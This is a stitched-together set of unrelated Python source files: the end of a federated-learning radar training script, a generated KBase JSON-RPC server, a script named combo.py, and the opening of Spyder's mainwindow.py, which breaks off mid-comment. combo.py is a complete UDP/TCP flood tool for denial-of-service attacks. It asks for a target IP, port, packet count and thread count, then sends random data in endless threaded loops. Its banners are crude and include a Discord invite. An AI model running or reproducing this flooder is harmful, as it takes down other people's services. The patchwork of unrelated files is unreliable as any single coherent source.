- mewma) * n_l1_saved[:, neighbor_index] n_l2_saved[:, neighbor_index] = mewma * gradn_up_neigh_l2[:, ii_saved_local] + (1 - mewma) * n_l2_saved[:, neighbor_index] W_up_l1 = W_up_l1 - learning_rate1 * W_l1_saved[:, :, :, neighbor_index] n_up_l1 = n_up_l1 - learning_rate1 * n_l1_saved[:, neighbor_index] W_up_l2 = W_up_l2 - learning_rate2 * W_l2_saved[:, :, neighbor_index] n_up_l2 = n_up_l2 - learning_rate2 * n_l2_saved[:, neighbor_index] else: W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 else: W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 return W_up_l1, n_up_l1, W_up_l2, n_up_l2, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved # CFA def getFederatedWeight(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, devices, ii_saved_local, epoch, v_loss,eng, neighbors): if (federated): if devices > 1: # multihop topology if epoch == 0: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) W_up_l1 = n_W_l1 n_up_l1 = n_b_l1 W_up_l2 = n_W_l2 n_up_l2 = n_b_l2 else: sio.savemat('temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) # neighbor_vec = [ii_saved_local - 1, ii_saved_local + 1] neighbor_vec = get_connectivity(ii_saved_local, 
neighbors, devices) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) or not os.path.isfile( 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch - 1)) pause(1) [W_up_l1, n_up_l1, W_up_l2, n_up_l2] = federated_weights_computing2( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1), 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), ii_saved_local, neighbor_vec[neighbor_index], epoch, devices, neighbors) pause(5) try: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2}) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) except: print('Unable to save file .. retrying') pause(3) sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2}) W_up_l1 = np.asarray(mathcontent['weights1']) n_up_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_l2 = np.asarray(mathcontent['weights2']) n_up_l2 = np.squeeze(np.asarray(mathcontent['biases2'])) else: W_up_l1 = n_W_l1 n_up_l1 = n_b_l1 W_up_l2 = n_W_l2 n_up_l2 = n_b_l2 return W_up_l1, n_up_l1, W_up_l2, n_up_l2 def processData(samples, iii, federated, tot_devices,fraction_training, neighbors_number,EPOCH_THRESHOLD): # eng = matlab.engine.start_matlab() eng = 0 global learning_rate learning_rate_local = learning_rate np.random.seed(1) tf.set_random_seed(1) # common initialization # mnist = input_data.read_data_sets("/tmp/data/", one_hot=True) # MNIST DATABASE USED AS AN ALTERNATIVE # mnist2 = input_data.read_data_sets("/tmp/data/", one_hot=True) database = sio.loadmat('dati_radar_05-07-2019/data_base_all_sequences_random.mat') x_train = database['Data_train_2'] y_train = database['label_train_2'] y_train_t = to_categorical(y_train) x_train = (x_train.astype('float32') + 140) / 140 # DATA PREPARATION (NORMALIZATION AND SCALING OF FFT MEASUREMENTS) x_train2 = x_train[iii * samples:((iii + 1) * samples - 1), :] # DATA PARTITION y_train2 = y_train_t[iii * samples:((iii + 1) * samples - 1),:] x_test = database['Data_test_2'] y_test = database['label_test_2'] x_test = (x_test.astype('float32') + 140) / 140 y_test_t = to_categorical(y_test) total_batch2 = int(fraction_training / batch_size) # tf Graph Input x = tf.placeholder(tf.float32, [None, 512]) # 512 POINT FFT RANGE MEASUREMENTS y = tf.placeholder(tf.float32, [None, 8]) # 0-7 HR distances (safe - unsafe) W_ext_l1 = tf.placeholder(tf.float32, [filter, 1, number]) b_ext_l1 = tf.placeholder(tf.float32, [number]) W_ext_l2 = tf.placeholder(tf.float32, [multip * number, 8]) b_ext_l2 = tf.placeholder(tf.float32, [8]) W2_ext_l1 = tf.placeholder(tf.float32, [filter, 1, number]) b2_ext_l1 = tf.placeholder(tf.float32, [number]) W2_ext_l2 = tf.placeholder(tf.float32, [multip * number, 8]) b2_ext_l2 = tf.placeholder(tf.float32, [8]) # Set model weights W_l1 = tf.Variable(tf.random_normal([filter, 1, number])) b_l1 = tf.Variable(tf.random_normal([number])) W_l2 = tf.Variable(tf.zeros([multip * number, 8])) b_l2 = tf.Variable(tf.zeros([8])) # Construct model Layer #1 CNN 1d, Layer #2 FC hidden0 = conv1d(x, W_ext_l1, b_ext_l1) hidden01 = tf.layers.max_pooling1d(hidden0, pool_size=stride, strides=stride, padding='SAME') fc01 = tf.reshape(hidden01, [-1, multip*number]) pred = tf.nn.softmax(tf.matmul(fc01, W_ext_l2) + b_ext_l2) # example 2 
layers hidden2 = conv1d(x, W2_ext_l1, b2_ext_l1) hidden02 = tf.layers.max_pooling1d(hidden2, pool_size=stride, strides=stride, padding='SAME') fc02 = tf.reshape(hidden02, [-1, multip*number]) pred2 = tf.nn.softmax(tf.matmul(fc02, W2_ext_l2) + b2_ext_l2) # example 2 layers # Minimize error using cross entropy cost = tf.reduce_mean(-tf.reduce_sum(y * tf.log(tf.clip_by_value(pred, 1e-15, 0.99)), reduction_indices=1)) cost2 = tf.reduce_mean(-tf.reduce_sum(y * tf.log(tf.clip_by_value(pred2, 1e-15, 0.99)), reduction_indices=1)) #gradients per layer grad_W_l1, grad_b_l1, grad_W_l2, grad_b_l2 = tf.gradients(xs=[W_ext_l1, b_ext_l1, W_ext_l2, b_ext_l2], ys=cost) new_W_l1 = W_l1.assign(W_ext_l1 - learning_rate * grad_W_l1) new_b_l1 = b_l1.assign(b_ext_l1 - learning_rate * grad_b_l1) new_W_l2 = W_l2.assign(W_ext_l2 - learning_rate * grad_W_l2) new_b_l2 = b_l2.assign(b_ext_l2 - learning_rate * grad_b_l2) # Initialize the variables (i.e. assign their default value) init = tf.global_variables_initializer() # Start training with tf.Session() as sess: sess.run(init) total_batch = int(samples / batch_size) # PRINTS THE TOTAL NUMBER OF MINI BATCHES print(total_batch) # Training cycle val_loss = np.zeros(training_epochs) for epoch in range(training_epochs): avg_cost = 0. avg_cost_test = 0. for i in range(total_batch): batch_xs = x_train2[i * batch_size:((i + 1) * batch_size - 1), :] batch_ys = y_train2[i * batch_size:((i + 1) * batch_size - 1), :] if (i == 0) and (epoch == 0): # initialization # W_val_l1 = np.zeros([512, 32]) W_val_l1 = np.random.normal(0.0, 1.0, (filter, 1, number)) # b_val_l1 = np.zeros([32]) b_val_l1 = np.random.normal(0.0, 1.0, number) W_val_l2 = np.zeros([multip*number, 8]) b_val_l2 = np.zeros([8]) elif (i > 0): W_val_l1 = n_W_l1 # modify for minibatch updates b_val_l1 = n_b_l1 W_val_l2 = n_W_l2 # modify for minibatch updates b_val_l2 = n_b_l2 # Fit training using batch data n_W_l1, n_b_l1, n_W_l2, n_b_l2, c, g_W_l1, g_b_l1, g_W_l2, g_b_l2 = sess.run([new_W_l1, new_b_l1, new_W_l2, new_b_l2, cost, grad_W_l1, grad_b_l1, grad_W_l2, grad_b_l2], feed_dict={x: batch_xs, y: batch_ys, W_ext_l1: W_val_l1, b_ext_l1: b_val_l1, W_ext_l2: W_val_l2, b_ext_l2: b_val_l2}) avg_cost += c / total_batch # Training loss # validation with tf.Session() as sess2: sess2.run(init) for i in range(total_batch2): # Construct model batch_xs = x_test[i * batch_size:((i + 1) * batch_size - 1), :] batch_ys = y_test_t[i * batch_size:((i + 1) * batch_size - 1), :] c = sess2.run(cost2, feed_dict={x: batch_xs, y: batch_ys, W2_ext_l1: n_W_l1, b2_ext_l1: n_b_l1, W2_ext_l2: n_W_l2, b2_ext_l2: n_b_l2}) avg_cost_test += c / total_batch2 val_loss[epoch] = avg_cost_test print('Test Device: ' + str(iii) + " Epoch:", '%04d' % (epoch + 1), "cost=", "{:.9f}".format(avg_cost_test)) ########################################################### # CFA: weights exchange (no gradients) # COMMENT BELOW IF CFA IS SELECTED # W_val_l1, b_val_l1, W_val_l2, b_val_l2 = getFederatedWeight(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, tot_devices, iii, epoch, val_loss, eng, neighbors_number) ################################################## ################################################### # CFA - GE: 2-stage negotiation after epoch EPOCH_THRESHOLD # COMMENT BELOW IF CFA IS SELECTED if epoch < EPOCH_THRESHOLD: if epoch < 2: W_l1_saved = np.zeros((filter, 1, number, neighbors_number)) W_l2_saved = np.zeros((multip * number, 8, neighbors_number)) n_l1_saved = np.zeros((number, neighbors_number)) n_l2_saved = np.zeros((8, neighbors_number)) W_val_l1, 
b_val_l1, W_val_l2, b_val_l2, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved = getFederatedWeight_gradients(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, tot_devices, iii, epoch, val_loss, eng, x_train2, y_train2, neighbors_number, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved) # method with gradients exchange else: W_val_l1, b_val_l1, W_val_l2, b_val_l2, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved = getFederatedWeight_gradients_fast(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, tot_devices, iii, epoch, val_loss, eng, x_train2, y_train2, neighbors_number, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved) # method with gradients exchange ########################################################### print("Optimization Finished!") # DUMP RESULTS sio.savemat( 'results/dump_loss_{}_{date:%Y-%m-%d-%H-%M-%S}.mat'.format(iii, date=datetime.datetime.now().time()), { "val_acc": val_loss, "device": iii}) # Test model # correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1)) # Calculate accuracy for 3000 examples # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) if __name__ == "__main__": # DELETE TEMPORARY CACHE FILES fileList = glob.glob('*.mat', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") ##################### SETS SIMULATION PARAMETERS ############################### devices = args.K # NUMBER OF DE VICES neighbors_number = args.N # NUMBER OF NEIGHBORS PER DEVICE (K-DEGREE NETWORK) ii_saved = 0 EPOCH_THRESHOLD = 4 # STARTING EPOCH FOR CFA-GE (2-STAGE NEGOTIATION) federated = True # ENABLE FEDERATED LEARNING) training_set_per_device = 25 # NUMBER OF TRAINING SAMPLES PER DEVICE fraction_training = int(devices*training_set_per_device) # total training b_v = 1/devices balancing_vect = np.ones(devices)*b_v samples = np.zeros(devices) # training samples per device validation_train = 16000 # VALIDATION DATASET ################################################################################### # START MULTIPROCESSING for id in range(devices): samples[id] = math.floor(balancing_vect[id]*fraction_training) # samples = int(fraction_training/devices) # training samples per device print(samples) t = [] iii = 0 for ii in range(devices): t.append(multiprocessing.Process(target=processData, args=(int(samples[ii]), ii, federated, devices, validation_train, neighbors_number, EPOCH_THRESHOLD))) t[ii].start() exit(0)
jayrboltonContigFilterServer.py
#!/usr/bin/env python # -*- coding: utf-8 -*- from wsgiref.simple_server import make_server import sys import json import traceback import datetime from multiprocessing import Process from getopt import getopt, GetoptError from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\ JSONRPCError, InvalidRequestError from jsonrpcbase import ServerError as JSONServerError from os import environ from ConfigParser import ConfigParser from biokbase import log import requests as _requests import random as _random import os from jayrboltonContigFilter.authclient import KBaseAuth as _KBaseAuth DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' AUTH = 'auth-service-url' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'jayrboltonContigFilter'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from jayrboltonContigFilter.jayrboltonContigFilterImpl import jayrboltonContigFilter # noqa @IgnorePep8 impl_jayrboltonContigFilter = jayrboltonContigFilter(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = JSONServerError() newerr.trace = traceback.format_exc() if isinstance(e.message, basestring): newerr.data = e.message else: # Some exceptions embed other exceptions as the message newerr.data = repr(e.message) raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. 
""" rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns its response.""" if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8 self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self['provenance'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def provenance(self): callbackURL = os.environ.get('SDK_CALLBACK_URL') if callbackURL: # OK, there's a callback server from which we can get provenance arg_hash = {'method': 'CallbackServer.get_provenance', 'params': [], 'version': '1.1', 'id': str(_random.random())[2:] } body = json.dumps(arg_hash) response = _requests.post(callbackURL, data=body, timeout=60) response.encoding = 'utf-8' if response.status_code == 500: if ('content-type' in response.headers and response.headers['content-type'] == 'application/json'): err = response.json() if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, response.text) else: raise ServerError('Unknown', 0, response.text) if not response.ok: response.raise_for_status() resp = response.json() if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'][0] else: return self.get('provenance') class ServerError(Exception): ''' The call returned an error. 
Fields: name - the name of the error. code - the error code. message - a human readable error message. data - the server side stacktrace. ''' def __init__(self, name, code, message, data=None, error=None): super(Exception, self).__init__(message) self.name = name self.code = code self.message = message if message else '' self.data = data or error or '' # data = JSON RPC 2.0, error = 1.1 def __str__(self): return self.name + ': ' + str(self.code) + '. ' + self.message + \ '\n' + self.data def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'jayrboltonContigFilter' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_jayrboltonContigFilter.filter_contigs, name='jayrboltonContigFilter.filter_contigs', types=[basestring, dict]) self.method_authentication['jayrboltonContigFilter.filter_contigs'] = 'required' # noqa self.rpc_service.add(impl_jayrboltonContigFilter.status, name='jayrboltonContigFilter.status', types=[dict]) authurl = config.get(AUTH) if config else None self.auth_client = _KBaseAuth(authurl) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = { 'call_stack': [{'time': self.now_in_utc(), 'method': req['method']} ] } prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params'] } ctx['provenance'] = [prov_action] try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] auth_req = self.method_authentication.get( method_name, 'none') if auth_req != 'none': if token is None and auth_req == 'required': err = JSONServerError() err.data = ( 'Authentication required for ' + 'jayrboltonContigFilter ' 
+ 'but no authentication header was passed') raise err elif token is None and auth_req == 'optional': pass else: try: user = self.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception, e: if auth_req == 'required': err = JSONServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print 'Request method was %s\n' % environ['REQUEST_METHOD'] # print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ) # print 'Request body was: %s' % request_body # print 'Result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] e = error['error'].get('error') if not e: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8 dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. 
# This simply lists where to "mount" the application in the URL path # # This uwsgi module "magically" appears when running the app within # uwsgi and is not available otherwise, so wrap an exception handler # around it # # To run this server in uwsgi with 4 workers listening on port 9999 use: # uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_ # To run a using the single threaded python BaseHTTP service # listening on port 9999 by default execute this file # try: import uwsgi # Before we do anything with the application, see if the # configs specify patching all std routines to be asynch # *ONLY* use this if you are going to wrap the service in # a wsgi container that has enabled gevent, such as # uwsgi with the --gevent option if config is not None and config.get('gevent_monkeypatch_all', False): print "Monkeypatching std libraries for async" from gevent import monkey monkey.patch_all() uwsgi.applications = {'': application} except ImportError: # Not available outside of wsgi, ignore pass _proc = None def start_server(host='localhost', port=0, newprocess=False): ''' By default, will start the server on localhost on a system assigned port in the main thread. Excecution of the main thread will stay in the server main loop until interrupted. To run the server in a separate process, and thus allow the stop_server method to be called, set newprocess = True. This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print "Listening on port %s" % port if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user = application.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 ctx['module'], ctx['method'] = req['method'].split('.') prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params']} ctx['provenance'] = [prov_action] resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1])): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError as 
err:
        # print help information and exit:
        print str(err)  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print "Host set to %s" % host
        else:
            assert False, "unhandled option"
    start_server(host=host, port=port)
    # print "Listening on port %s" % port
    # httpd = make_server( host, port, application)
    # # httpd.serve_forever()
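A minimal sketch of how the CLI job mode above can be exercised: `process_async_cli` reads a JSON-RPC-style request file with `method` and `params` (and optional `id`/`version`), and the `__main__` block dispatches to it when given an input path, an output path, and an optional token. The file names, the saved module name (`server.py`), and the example params below are illustrative assumptions, not part of the generated server.

# Illustrative only: write a request file for process_async_cli and show the
# expected invocation. File names and params values are hypothetical examples.
import json

request = {
    "version": "1.1",
    "id": "12345",
    "method": "jayrboltonContigFilter.status",  # a method registered above
    "params": [{}],                             # params list for that method
}

with open("job_input.json", "w") as f:
    json.dump(request, f)

# Then (assuming the server module above is saved as server.py):
#   python server.py job_input.json job_output.json [token_or_token_file]
# job_output.json will contain the JSON response (an error envelope on failure).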
combo.py
#!/usr/bin/env python3 import random import socket import threading print (" - - > AUTHOR : XTraylinz CODE : XTraylinz < - - ") print (" - - > XTraylinz x XNextTime NIH BOS!! < - - ") print (" - - > AJARIN CUPU DONG BANG XIXI < - - ") print (" - - > XTraylinz#0965 & XNextTime#4668 <- - ") print (" - - > KALO MAU RENAME PM GUA DULU NGENTOD < - - ") print (" - - > PENCET LINK DIBAWAH AJG < - - ") print (" - - > https://discord.gg/CEbs6UFgga < - - ") print (" - - > GA JOIN = ANAK HARAM < - - ") ip = str(input(" Ip Nya:")) port = int(input(" Port Nya:")) choice = str(input(" HANCURIN GAK NICH? (y/n):")) times = int(input(" MAU BERAPA PAKET:")) threads = int(input(" KIRIM BERAPA BARANGNYA:")) def run(): data = random._urandom(1000) i = random.choice(("[+]","[-]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) addr = (str(ip),int(port)) for x in range(times): s.sendto(data,addr) print(i +" XTraylinz x XNextTime NIH BOS !! ") except: print("[!] GASUKA BAYWAN DECK") def run2(): data = random._urandom(16) i = random.choice(("[*]","[!]","[#]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip,port)) s.send(data) for x in range(times): s.send(data) print(i +" XTraylinz x XNextTime NIH BOS !! ") except: s.close() print("[*] GASUKA BAYWAN DECK") for y in range(threads): if choice == 'y': th = threading.Thread(target = run) th.start() else: th = threading.Thread(target = run2) th.start()
mainwindow.py
# -*- coding: utf-8 -*- # # Copyright © Spyder Project Contributors # Licensed under the terms of the MIT License # (see spyder/__init__.py for details) """ Spyder, the Scientific Python Development Environment ===================================================== Developped and maintained by the Spyder Project Contributors Copyright © Spyder Project Contributors Licensed under the terms of the MIT License (see spyder/__init__.py for details) """ # ============================================================================= # Stdlib imports # ============================================================================= from __future__ import print_function import errno import gc import logging import os import os.path as osp import re import signal import socket import subprocess import sys import threading import traceback import importlib logger = logging.getLogger(__name__) #============================================================================== # Keeping a reference to the original sys.exit before patching it #============================================================================== ORIGINAL_SYS_EXIT = sys.exit #============================================================================== # Check requirements #============================================================================== from spyder import requirements requirements.check_path() requirements.check_qt() requirements.check_spyder_kernels() #============================================================================== # Windows only: support for hiding console window when started with python.exe #============================================================================== set_attached_console_visible = None is_attached_console_visible = None set_windows_appusermodelid = None if os.name == 'nt': from spyder.utils.windows import (set_attached_console_visible, is_attached_console_visible, set_windows_appusermodelid) #============================================================================== # Workaround: importing rope.base.project here, otherwise this module can't # be imported if Spyder was executed from another folder than spyder #============================================================================== try: import rope.base.project # analysis:ignore except ImportError: pass #============================================================================== # Qt imports #============================================================================== from qtpy import API, PYQT5 from qtpy.compat import from_qvariant from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt, QThread, QTimer, QUrl, Signal, Slot) from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow, QMenu, QMessageBox, QShortcut, QSplashScreen, QStyleFactory, QWidget, QDesktopWidget) # Avoid a "Cannot mix incompatible Qt library" error on Windows platforms from qtpy import QtSvg # analysis:ignore # Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720 from qtpy import QtWebEngineWidgets # analysis:ignore # For issue 7447 try: from qtpy.QtQuick import QQuickWindow, QSGRendererInterface except Exception: QQuickWindow = QSGRendererInterface = None # To catch font errors in QtAwesome from qtawesome.iconic_font import FontError #============================================================================== # Proper high DPI scaling is available in Qt >= 5.6.0. This attibute must # be set before creating the application. 
